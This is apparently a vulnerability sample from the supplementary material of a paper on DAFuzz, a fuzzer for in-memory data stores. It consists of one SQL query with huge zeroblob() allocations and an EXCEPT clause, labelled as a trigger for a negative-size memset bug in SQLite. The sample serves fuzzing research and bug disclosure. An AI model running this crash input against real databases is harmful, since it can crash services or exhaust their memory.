# Supplementary material for: DAFuzz: data-aware fuzzing of in-memory data stores
Source: PeerJ Comput Sci. 2023 Sep 19;9:e1592. doi: 10.7717/peerj-cs.1592 (PMC10557509; doi:10.7717/peerj-cs.1592)
Supplement: Supplemental Information 2 [file peerj-cs-09-1592-s002.zip › DAFuzz/docs/vuln_samples/sqlite-negative-memset.sql]

SELECT*from(select"",zeroblob(0),zeroblob(1E9),zeroblob(0),zeroblob(150000000),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(1E9),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0)),(select"",zeroblob(1E9),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(1E9),(0),zeroblob(150000000),(0),zeroblob(0),(0)EXCEPT select zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0),zeroblob(0));
